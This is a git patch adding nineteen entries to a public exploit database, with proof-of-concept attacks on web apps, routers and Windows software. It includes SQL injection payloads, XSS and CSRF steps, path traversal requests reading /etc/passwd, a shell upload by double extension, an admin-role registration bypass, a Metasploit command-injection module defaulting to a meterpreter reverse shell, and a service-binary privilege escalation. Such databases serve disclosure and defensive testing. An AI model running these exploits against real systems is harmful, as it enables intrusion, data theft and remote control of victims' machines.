From deaee53895d9efff89051ba9b7aaa93fa830545f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 8 Jan 2019 05:01:58 +0000 Subject: [PATCH] DB: 2019-01-08 19 changes to exploits/shellcodes Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC) SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC) Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC) KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation Mailcleaner - Authenticated Remote Code Execution (Metasploit) Embed Video Scripts - Persistent Cross-Site Scripting All in One Video Downloader 1.2 - Authenticated SQL Injection LayerBB 1.1.1 - Persistent Cross-Site Scripting MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS) --- exploits/cgi/webapps/46081.txt | 20 ++++ exploits/hardware/webapps/46092.py | 49 ++++++++ exploits/php/webapps/46076.txt | 36 ++++++ exploits/php/webapps/46077.txt | 20 ++++ exploits/php/webapps/46079.txt | 24 ++++ exploits/php/webapps/46080.txt | 26 ++++ exploits/php/webapps/46082.txt | 157 ++++++++++++++++++++++++ exploits/php/webapps/46083.txt | 54 +++++++++ exploits/php/webapps/46084.txt | 34 ++++++ exploits/php/webapps/46085.txt | 177 ++++++++++++++++++++++++++++ exploits/python/remote/46075.rb | 144 ++++++++++++++++++++++ exploits/windows/dos/46078.html | 51 ++++++++ exploits/windows/dos/46087.py | 25 ++++ exploits/windows/dos/46088.py | 25 ++++ exploits/windows/dos/46089.py | 30 +++++ exploits/windows/local/46093.txt | 71 +++++++++++ exploits/windows/webapps/46086.txt | 60 ++++++++++ exploits/windows/webapps/46090.html | 58 +++++++++ exploits/windows/webapps/46091.html | 83 +++++++++++++ files_exploits.csv | 19 +++ 20 files changed, 1163 insertions(+) create mode 100644 exploits/cgi/webapps/46081.txt create mode 100755 exploits/hardware/webapps/46092.py create mode 100644 exploits/php/webapps/46076.txt create mode 100644 exploits/php/webapps/46077.txt create mode 100644 exploits/php/webapps/46079.txt create mode 100644 exploits/php/webapps/46080.txt create mode 100644 exploits/php/webapps/46082.txt create mode 100644 exploits/php/webapps/46083.txt create mode 100644 exploits/php/webapps/46084.txt create mode 100644 exploits/php/webapps/46085.txt create mode 100755 exploits/python/remote/46075.rb create mode 100644 exploits/windows/dos/46078.html create mode 100755 exploits/windows/dos/46087.py create mode 100755 exploits/windows/dos/46088.py create mode 100755 exploits/windows/dos/46089.py create mode 100644 exploits/windows/local/46093.txt create mode 100644 exploits/windows/webapps/46086.txt create mode 100644 exploits/windows/webapps/46090.html create mode 100644 exploits/windows/webapps/46091.html diff --git a/exploits/cgi/webapps/46081.txt b/exploits/cgi/webapps/46081.txt new file mode 100644 index 000000000..6ae620f74 --- /dev/null +++ b/exploits/cgi/webapps/46081.txt @@ -0,0 +1,20 @@ +# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Reflected XSS +# Date: 21/12/2018 +# Exploit Author: Kumar Saurav +# Reference: https://0dayfindings.home.blog/2018/12/26/plc-wireless-router-gpn2-4p21-c-cn-reflected-xss/ +# Vendor: ChinaMobile +# Category: Hardware +# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00) +# Tested on: Multiple +# CVE : CVE-2018-20326 + +#Description: PLC Wireless Router's are vulnerable to a Reflected Cross Site Scripting (XSS).With this attack, the threat actor can steal cookies, session id, username or other sensitive information redirect an innocent victim to a malicious website, thus compromising the user. + +Reproduction Steps: +Step 1: Go to Wi-fi Router Gateway (192.168.59.254 in my case) +Step 2: Login as Username and Password +Step 3: After Login below url will be shown + (http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-) +Step 4: Insert the payload "" at the end of the above mentinoed url and hit enter + (http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-) +Step 5: On execution of the payload, it will be popped up as "XSS-Saurav" \ No newline at end of file diff --git a/exploits/hardware/webapps/46092.py b/exploits/hardware/webapps/46092.py new file mode 100755 index 000000000..b1b5c4531 --- /dev/null +++ b/exploits/hardware/webapps/46092.py @@ -0,0 +1,49 @@ +# Exploit Title: Huawei E5330 Cross-Site Request Forgery (Send SMS) +# Date: 01/07/2019 +# Exploit Author: Nathu Nandwani +# Website: http://nandtech.co/ +# Vendor Homepage: https://consumer.huawei.com/in/mobile-broadband/e5330/ +# Version: 21.210.09.00.158 +# Tested on: Windows 10 x64 +# CVE: CVE-2014-5395 +# Note: The administrator who opens the URL should be authenticated. +import socket +import time + +server_ip = "0.0.0.0" +server_port = 80 + +huawei_ip = "192.168.8.1" +receiving_phone_no = "01234567890" +sms_text = "This is a SPAM text from Huawei E5330" + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.bind((server_ip, server_port)) +sock.listen(1) + +print "Currently listening at " + server_ip + ":" + str(server_port) + +client, (client_host, client_port) = sock.accept() + +print "Client connected: " + client_host + ":" + str(client_port) +print "" +print client.recv(1000) + +client.send('HTTP/1.0 200 OK\r\n') +client.send('Content-Type: text/html\r\n') +client.send('\r\n') + +client.send(""" + + + + + +""") + +client.close() +sock.close() \ No newline at end of file diff --git a/exploits/php/webapps/46076.txt b/exploits/php/webapps/46076.txt new file mode 100644 index 000000000..56d1d96fb --- /dev/null +++ b/exploits/php/webapps/46076.txt @@ -0,0 +1,36 @@ +# Exploit Title: Embed Video Scripts - Cross-site Script (stored) +# Google Dork: N/A +# Date: 1 Jan 2019 +# Exploit Author: Deyaa Muhammad +# Author EMail: contact [at] deyaa.me +# Author Blog: http://deyaa.me +# POC Video: https://youtu.be/2CFJLwkxpT8 +# Vendor Homepage: https://codeawesome.in/embed/ +# Software Link: https://codecanyon.net/item/embed-video-scripts/20831073 +# Demo Website: https://codeawesome.in/embed/ +# Version: N/A +# Tested on: WIN7_x68/Linux +# CVE : N/A + +# Description: +A stored xss found in "Embed Video Scripts" comments section. + +# POC Request: + +:method: POST +:authority: server +:scheme: https +:path: /embed/comments +content-length: 145 +accept: */* +origin: https://server +x-requested-with: XMLHttpRequest +user-agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +content-type: application/x-www-form-urlencoded; charset=UTF-8 +accept-encoding: gzip, deflate, br +accept-language: en-US,en;q=0.9 +cookie: __cfduid=de9f1151befbf3ccdb372b7c1afb0a3bb1546252540 +cookie: _tccl_visitor=208f2702-6472-41aa-b129-088a32f1eda6 +cookie: _tccl_visit=208f2702-6472-41aa-b129-088a32f1eda6 + +message=&post_id=1&save=1&avatar=https%3A%2F%2Fserver%2Fembed%2Fassets%2Fimages%2Favatar%2F1.png \ No newline at end of file diff --git a/exploits/php/webapps/46077.txt b/exploits/php/webapps/46077.txt new file mode 100644 index 000000000..ae4b0dcd4 --- /dev/null +++ b/exploits/php/webapps/46077.txt @@ -0,0 +1,20 @@ +# Exploit Title: All in One Video Downloader 1.2 - SQL Injection +# Google Dork: "developed by Niche Office" +# Date: 1 Jan 2019 +# Exploit Author: Deyaa Muhammad +# Author EMail: contact [at] deyaa.me +# Author Blog: http://deyaa.me +# Vendor Homepage: https://nicheoffice.web.tr/ +# Software Link: https://codecanyon.net/item/all-in-one-video-downloader-youtube-and-more/22599418 +# Demo Website: https://aiovideodl.ml/ +# Demo Admin Panel: https://aiovideodl.ml/admin/ +# Demo Admin Credentials: demo@aiovideodl.ml/123456 +# Version: 1.2 +# Tested on: WIN7_x68/cloudflare +# CVE : N/A + +# POC: +https://[PATH]/admin/?view=page-edit&id=2.9'+[SQLI]-- - + +# Exploit: +https://[PATH]/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- - \ No newline at end of file diff --git a/exploits/php/webapps/46079.txt b/exploits/php/webapps/46079.txt new file mode 100644 index 000000000..685e14bbf --- /dev/null +++ b/exploits/php/webapps/46079.txt @@ -0,0 +1,24 @@ +# Exploit Title: LayerBB 1.1.1 - Cross-Site Scripting +# Date: 10/4/2018 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=26 +# Version: 1.1.1 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2018-17997 + + +1. Description: +LayerBB is a free open-source forum software. The XSS found allows users to add a payload to the title of conversations (PMs). + + +2. Proof of Concept: + +- Start a new conversation sending to any user (victim) you want +- Use a payload in the title +- Next time the user (victim) visits the site payload will execute + + +3. Solution: +Update to 1.1.2 \ No newline at end of file diff --git a/exploits/php/webapps/46080.txt b/exploits/php/webapps/46080.txt new file mode 100644 index 000000000..acd0a6810 --- /dev/null +++ b/exploits/php/webapps/46080.txt @@ -0,0 +1,26 @@ +# Exploit Title: MyBB OUGC Awards Plugin v1.8.3 - Cross-Site Scripting +# Date: 12/31/2018 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://community.mybb.com/mods.php?action=view&pid=396 +# Version: 1.8.3 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2019-3501 + + +1. Description: +OUGC Awards plugin for MyBB forum allows admins and moderators to grant awards to users which displays on profiles/posts. The reason input isn't sanitized on awards page and user profiles. + + +2. Proof of Concept: + +- Have a mod account level or higher +- Go to Manage Awards in ModCP +- Give an award to a user and input payload for reason + +- Payload executes when viewing award on awards.php and user profiles. + + +3. Solution: +Update to 1.8.19 \ No newline at end of file diff --git a/exploits/php/webapps/46082.txt b/exploits/php/webapps/46082.txt new file mode 100644 index 000000000..7b4972b84 --- /dev/null +++ b/exploits/php/webapps/46082.txt @@ -0,0 +1,157 @@ +################################################################################################################################## +# Exploit Title: phpMoAdmin 1.1.5 - MongoDB GUI | Multiple Vulnerabilities +# Date: 03.01.2019 +# Exploit Author: Ozer Goker +# Vendor Homepage: http://www.phpmoadmin.com +# Software Link: http://www.phpmoadmin.com/file/phpmoadmin.zip +# Version: 1.1.5 +################################################################################################################################## + +Introduction + +phpMoAdmin - MongoDB GUI +MongoDB administration tool for PHP + +Vulnerabilities: CSRF | XSS Reflected & Stored + +CSRF details: + +################################################################################# + +CSRF1 + +Create Database + + + + +
+ + + +
+ + + + +################################################################################# + +CSRF2 + +Drop Database + + + +
+ + + +
+ + + +################################################################################# + +CSRF3 + +Repair Database + + + +
+ + + +
+ + + +################################################################################# + +CSRF4 + +Add New Collection + + + +
+ + + + +
+ + + +################################################################################# + +CSRF5 + +Drop Collection + + + +
+ + + + +
+ + + + +################################################################################# + + +XSS details: + +################################################################################# + +XSS1 | Reflected + +URL +http://localhost/phpmoadmin/moadmin.php?db=admin%3Cscript%3Ealert(1)%3C/script%3E + +METHOD +Get + +PARAMETER +db + +PAYLOAD + + +################################################################################# + +XSS2 | Reflected + +URL +http://localhost/phpmoadmin/moadmin.php?db=new.database&newdb=testdb%3Cscript%3Ealert(2)%3C/script%3E + +METHOD +Get + +PARAMETER +newdb + +PAYLOAD + + +################################################################################# + +XSS3 | Stored +URL +http://localhost/phpmoadmin/moadmin.php?collection=%3Cscript%3Ealert%283%29%3C%2Fscript%3E&action=createCollection&db=testdb + +METHOD +Get + +PARAMETER +collection + +PAYLOAD + + + +################################################################################# \ No newline at end of file diff --git a/exploits/php/webapps/46083.txt b/exploits/php/webapps/46083.txt new file mode 100644 index 000000000..9cbc4cae0 --- /dev/null +++ b/exploits/php/webapps/46083.txt @@ -0,0 +1,54 @@ +# Exploit Title: Wordpress Plugin UserPro < 4.9.21 User Registration With Administrator Role +# Google Dork: inurl:/wp-content/plugins/userpro/ +# Date: 3rd January, 2019 +# Exploit Author: Noman Riffat +# Vendor Homepage: https://userproplugin.com/ +# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681 +# Version: < 4.9.21 +# Tested on: Wordpress 4.9.9 with linux but should work on all WP versions and OS as well + +UserPro fixed a user registration with administrator privileges vulnerability in version 4.9.21 +But there wasn't any POC available so this exploit demonstrates this +vulnerability. +https://demo.userproplugin.com/wp-content/plugins/userpro/changelog.txt +From the changelog: "Security Fix : Registration role validation fix" + +The latest version up to now is 4.9.29 +The vulnerability allows anyone to register with Administrator role which +can easily be turned into RCE + +Steps to reproduce: + +1. Go to the registration form, input random fake values, trigger Burp +Suite and click submit. + +2. The POST data will look similar to following + +redirect_uri-701=&_myuserpro_nonce=xxxxxx&_wp_http_referer=%2F&unique_id=701&user_login-701=USERNAME&user_email-701= +USERNAME@EMAIL.COM +&user_pass-701=PASSWORD&user_pass_confirm-701=PASSWORD&display_name-701=&profilepicture-701=&country-701=&facebook-701=&twitter-701=&google_plus-701=&user_url-701=&terms=on&action=userpro_process_form&template=register&group=default&shortcode=xxxxxxxxxxxxxxxxxxxxxxxxxxx + +Here "-701" is a random postfix number and gets stripped at the server. +Other than that, the interesting values are + +user_login +user_email +user_pass +user_pass_confirm + +3. Adding following extra parameter in POST data will register the user +with Administrator privileges + +role-701=administrator + +So the modified POST data will look similar to following + +role-701=administrator&redirect_uri-701=&_myuserpro_nonce=xxxxxx&....snip....snip.... + +4. Forward the POST data in Burp Suite and you will get redirect to +/profile/ page with Administrator menu on top. Access /wp-admin/ to get to +the dashboard + +5. Upload shell with default methods + +@nomanriffat \ No newline at end of file diff --git a/exploits/php/webapps/46084.txt b/exploits/php/webapps/46084.txt new file mode 100644 index 000000000..48c6eff50 --- /dev/null +++ b/exploits/php/webapps/46084.txt @@ -0,0 +1,34 @@ +# Exploit Title: MyT-PM 1.5.1 - 'Charge[group_total]' SQL Injection +# Date: 03.01.2019 +# Exploit Author: Mehmet Önder Key +# Vendor Homepage: https://manageyourteam.net/ +# Software Link: https://sourceforge.net/projects/myt/ +# Version: v1.5.1 +# Category: Webapps +# Tested on: WAMPP @Win +# Software description: +MyT (Manage Your Team) - is a free open source task management and project +management system, based on Yii Framework, easy to use and with a great +perspective of growth for the future. + +# Vulnerabilities: +# An attacker can access all data following an un/authorized user login +using the parameter. + +# POC - SQL Injection : + +# Parameter: Charge[group_total](POST) +# Request URL: /charge/admin + +# Type : Error Based +# Payload: Charge[user_name]=k&Charge[group_total]=1) AND +EXTRACTVALUE(2003,CONCAT(0x5c,0x7171716b71,(SELECT +(ELT(2003=2003,1))),0x7170707071))-- eaYu&Charge_page=1&ajax=charge-grid + +# Type : Time-Based Blind +# Payload: Charge[user_name]=k&Charge[group_total]=1) AND (SELECT * FROM +(SELECT(SLEEP(5)))ggBK)-- mGKC&Charge_page=1&ajax=charge-grid + +# Type : Stacked Queries +# Payload: Charge[user_name]=k&Charge[group_total]=1);SELECT +SLEEP(5)#&Charge_page=1&ajax=charge-grid \ No newline at end of file diff --git a/exploits/php/webapps/46085.txt b/exploits/php/webapps/46085.txt new file mode 100644 index 000000000..e061172d7 --- /dev/null +++ b/exploits/php/webapps/46085.txt @@ -0,0 +1,177 @@ +====================================================================== +Exploit Title:: Multiple Vulnerabilities +Software: Roxy Fileman +Version: 1.4.5 +Vendor Homepage: http://www.roxyfileman.com/ +Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-php +CVE number: CVE-2018-20525, CVE-2018-20526 +Found: 2018-12-07 +Tested on: PHP 7.0, Ubuntu 16.04 LTS +Author: Pongtorn Angsuchotmetee, Vittawat Masaree +SnoopBees Lab +https://www.snoopbees.com +======================================================================= +Description +=============================================================== +Roxy Fileman is free open source file browser for .NET and PHP, ready for +use with CKEditor and TinyMCE WYSIWYG html editors. It could be easily +integrated into a CMS or any other web application. Fileman is based on +JQuery and JQueryUI libraries and it's compatible with all modern browsers +- Internet Explorer, Firefox, Google Chrome, Safary and Opera. + +Roxy Fileman is designed to be as flexible as possible. The client +interface is completely separated from the server-side logic and scripts, +thus can be used with any server programming language - PHP, ASP .NET, +Python, Cold Fusion etc. All data exchanged including configuration and +language files is in light weight JSON format. Great performance - all data +from the server is loaded using Ajax without page reloading. Fileman has +ready to use distributions for PHP and .NET. All client-server +communications and configuration files are in JSON format and are language +independent. See custom server side scripts. +Ref: http://www.roxyfileman.com/ + +Vulnerability +================================== + + 1. Path Traversal (CVE-2018-20525) + 2. Unrestricted File Upload (CVE-2018-20526) + +================================== + +Proof of Concept +=========================== +1) Path Traversal (CVE-2018-20525) +================================== +The vulnerability affected file “copydir.php", “copyfile.php", +“fileslist.php". It is we can manipulating variables that reference files +with “dot-dot-slash (../)” to access arbitrary files and directories +access on file system. After copied the system file will appear on Roxy +file manager “http://[IP-Address]/fileman/Uploads". + +################################################# +---------------------------------------------------------------------------------- + +1.1. copydir.php + +POST /fileman/php/copydir.php HTTP/1.1 +Host: 10.10.10.190 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) +Gecko/20100101 Firefox/64.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://10.10.10.190/fileman/index.html +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 78 +Connection: close +Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af; +roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list + +d=%2Ffileman%2FUploads%2F*/../../../../../../../../etc/*&n=%2Ffileman%2FUploads/ + + +---------------------------------------------------------------------------------- + + +1.2. copyfile.php + +POST /fileman/php/copyfile.php HTTP/1.1 +Host: 10.10.10.190 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) +Gecko/20100101 Firefox/64.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://10.10.10.190/fileman/index.html +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 66 +Connection: close +Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af; +roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list + +f=%2Ffileman%2FUploads%2F*/../../../../../../../../etc/passwd*&type= +---------------------------------------------------------------------------------- + + +1.3. filelist.php + +POST /fileman/php/fileslist.php HTTP/1.1 +Host: 10.10.10.190 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) +Gecko/20100101 Firefox/64.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://10.10.10.190/fileman/index.html +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 65 +Connection: close +Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af; +roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list + +d=%2Ffileman%2FUploads%2FImages*/../../../../../../../../etc*&type= + +############################################################## +============================ +2) Unrestricted File Upload (CVE-2018-20526) +================================== +The vulnerability affected file upload.php and in the condition that the +php.ini file need have add the “*AddHandler php7-script .php*”. And now we +can upload the shell code file to the server by double extension such +as *shellcode.php.png +* + +-------------------------------------------------------------------------------------------------------------------- + +POST /fileman/php/upload.php HTTP/1.1 +Host: 10.10.10.190 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) +Gecko/20100101 Firefox/64.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://10.10.10.190/fileman/index.html +Content-Type: multipart/form-data; +boundary=---------------------------67141620012509 +Content-Length: 547 +Connection: close +Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af; roxyld=%2Ffileman%2FUploads; +roxyview=list + +-----------------------------67141620012509 +Content-Disposition: form-data; name="action" + +upload +-----------------------------67141620012509 +Content-Disposition: form-data; name="method" + +ajax +-----------------------------67141620012509 +Content-Disposition: form-data; name="d" + +/fileman/Uploads +-----------------------------67141620012509 +Content-Disposition: form-data; name="files[]"; filename="*phpshell.php.png*" + +Content-Type: image/png + +* * +-----------------------------67141620012509-- + +------------------------------------------------------------------------------------------------------------------------------------------- + + +Timeline +================================== +2018-12-07: Discovered the bug +2018-12-11: Reported to vendor (The vendor is unresponsive) +2018-12-19: Reported to vendor (The vendor is unresponsive) +2018-12-27: Request CVE +2019-01-03: Advisory published + +Discovered By: +===================== +Pongtorn Angsuchotmetee, Vittawat Masaree \ No newline at end of file diff --git a/exploits/python/remote/46075.rb b/exploits/python/remote/46075.rb new file mode 100755 index 000000000..e36153226 --- /dev/null +++ b/exploits/python/remote/46075.rb @@ -0,0 +1,144 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Mailcleaner Remote Code Execution", + 'Description' => %q{ + This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an + operating system command under the context of the web server user which is root. + + /admin/managetracing/search/search endpoint takes several user inputs and then pass them to the internal service which is responsible for executing + operating system command. One of the user input is being passed to the service without proper validation. That cause a command injection vulnerability. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/'] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'WfsDelay' => 5, + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'Platform' => ['python', 'unix'], + 'Arch' => [ ARCH_PYTHON, ARCH_CMD ], + 'Targets' => + [ + [ + 'Python payload', + { + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON, + } + ], + [ + 'Command payload', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'BadChars' => "\x26", + } + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Dec 19 2018", + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(443), + OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']), + OptString.new('USERNAME', [true, 'The username to login as']), + OptString.new('PASSWORD', [true, 'The password to login with']) + ] + ) + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def auth + print_status('Performing authentication...') + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'admin/') + }) + + if res && !res.get_cookies.empty? + cookie = res.get_cookies + else + fail_with(Failure::UnexpectedReply, 'Did not get cookie-set header from response.') + end + + # Performing authentication + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'admin/'), + 'cookie' => cookie, + 'vars_post' => { + 'username' => username, + 'password' => password, + 'submit' => 'Log+in' + } + }) + + if res && res.code == 302 + print_good("Awesome..! Authenticated with #{username}:#{password}") + else + fail_with(Failure::NoAccess, 'Credentials are not valid.') + end + + cookie + end + + def exploit + cookie = auth + + if cookie.nil? + fail_with(Failure::Unknown, 'Something went wrong!') + end + + print_status('Exploiting command injection flaw') + + if target['Arch'] == ARCH_PYTHON + cmd = "';$(python -c \"#{payload.encoded}\");#" + else + cmd = "';#{payload.encoded};#" + end + + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'admin', 'managetracing', 'search', 'search'), + 'cookie' => cookie, + 'vars_post' => { + 'search' => rand_text_alpha(5), + 'domain' => cmd, + 'submit' => 1 + } + }) + + end +end \ No newline at end of file diff --git a/exploits/windows/dos/46078.html b/exploits/windows/dos/46078.html new file mode 100644 index 000000000..29021809a --- /dev/null +++ b/exploits/windows/dos/46078.html @@ -0,0 +1,51 @@ + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/exploits/windows/dos/46087.py b/exploits/windows/dos/46087.py new file mode 100755 index 000000000..02e2dac54 --- /dev/null +++ b/exploits/windows/dos/46087.py @@ -0,0 +1,25 @@ +# Exploit Title: BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC) +# Discovery by: Luis Martinez +# Discovery Date: 2019-01-04 +# Vendor Homepage: www.nsauditor.com +# Software Link : http://www.nsauditor.com/downloads/blueauditor_setup.exe +# Tested Version: 1.7.2.0 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to Produce the Crash: +# 1.- Run python code : python BlueAuditor_1.7.2.0.py +# 2.- Open BlueAuditor_1.7.2.0.txt and copy content to clipboard +# 3.- Open BlueAuditor +# 4.- Register -> Enter Registration Code... +# 5.- Name: -> l4m5 +# 6.- Paste ClipBoard on "Key:" +# 7.- OK +# 8.- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 256 +f = open ("BlueAuditor_1.7.2.0.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46088.py b/exploits/windows/dos/46088.py new file mode 100755 index 000000000..958926254 --- /dev/null +++ b/exploits/windows/dos/46088.py @@ -0,0 +1,25 @@ +# Exploit Title: SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC) +# Discovery by: Luis Martinez +# Discovery Date: 2019-01-04 +# Vendor Homepage: www.nsauditor.com +# Software Link : http://www.nsauditor.com/downloads/spotftp_setup.exe +# Tested Version: 2.4.2 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to Produce the Crash: +# 1.- Run python code : python SpotFTP_Password_Recover_2.4.2.py +# 2.- Open SpotFTP_Password_Recover_2.4.2.txt and copy content to clipboard +# 3.- Open SpotFTP +# 4.- Register -> Enter Registration Code... +# 5.- Paste ClipBoard on "Name:" +# 6.- Key: -> L4M5 +# 7.- OK +# 8.- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 256 +f = open ("SpotFTP_Password_Recover_2.4.2.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46089.py b/exploits/windows/dos/46089.py new file mode 100755 index 000000000..ce237e146 --- /dev/null +++ b/exploits/windows/dos/46089.py @@ -0,0 +1,30 @@ +# Exploit Title: Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC) +# Discovery by: Luis Martinez +# Discovery Date: 2019-01-04 +# Vendor Homepage: https://www.foscam.es/ +# Software Link : https://www.foscam.es/descarga/FoscamVMS_1.1.4.9.zip +# Tested Version: 1.1.4.9 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to Produce the Crash: +# 1.- Run python code : python FoscamVMS_1.1.4.9.py +# 2.- Open FoscamVMS_1.1.4.9.txt and copy content to clipboard +# 3.- Open FoscamVMS +# 4.- User Name -> admin +# 5.- Password -> +# 6.- Login +# 7.- System Settings +# 8.- User Management Settings +# 9.- Add +# 10.- Paste ClipBoard on "Username" +# 11.- Password -> P4ssw0rd +# 12.- Save +# 13.- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 150 +f = open ("FoscamVMS_1.1.4.9.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/46093.txt b/exploits/windows/local/46093.txt new file mode 100644 index 000000000..7f0e8778e --- /dev/null +++ b/exploits/windows/local/46093.txt @@ -0,0 +1,71 @@ +# Exploit Title : KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation +# Date : 10/12/2018 +# Exploit Author : Hashim Jawad - @ihack4falafel +# Vendor Homepage : https://www.kioware.com/ +# Tested on : Windows Server 2016 Standard (x64) +# CVE : CVE-2018-18435 + +Description: +============ +KioWare Server version 4.9.6 and older installs by default to "C:\kioware_com" with weak folder permissions granting any user full permission "Everyone: (F)" to the contents of the directory and it's sub-folders. In addition, the program installs a service called "KWSService" which runs as "Localsystem", this will allow any user to escalate privileges to "NT AUTHORITY\SYSTEM" by substituting the service's binary with a malicious one. + +Proof: +====== +C:\>icacls c:\kioware_com +C:\kioware_com Everyone:(OI)(CI)(F) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) + BUILTIN\Administrators:(I)(OI)(CI)(F) + BUILTIN\Users:(I)(OI)(CI)(RX) + BUILTIN\Users:(I)(CI)(AD) + BUILTIN\Users:(I)(CI)(WD) + CREATOR OWNER:(I)(OI)(CI)(IO)(F) + +Successfully processed 1 files; Failed processing 0 files + +C:\>sc qc KWSService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: KWSService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START (DELAYED) + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : "C:\kioware_com\KWSS.exe" + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : KWS Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\>icacls C:\kioware_com\KWSS.exe +C:\kioware_com\KWSS.exe Everyone:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + 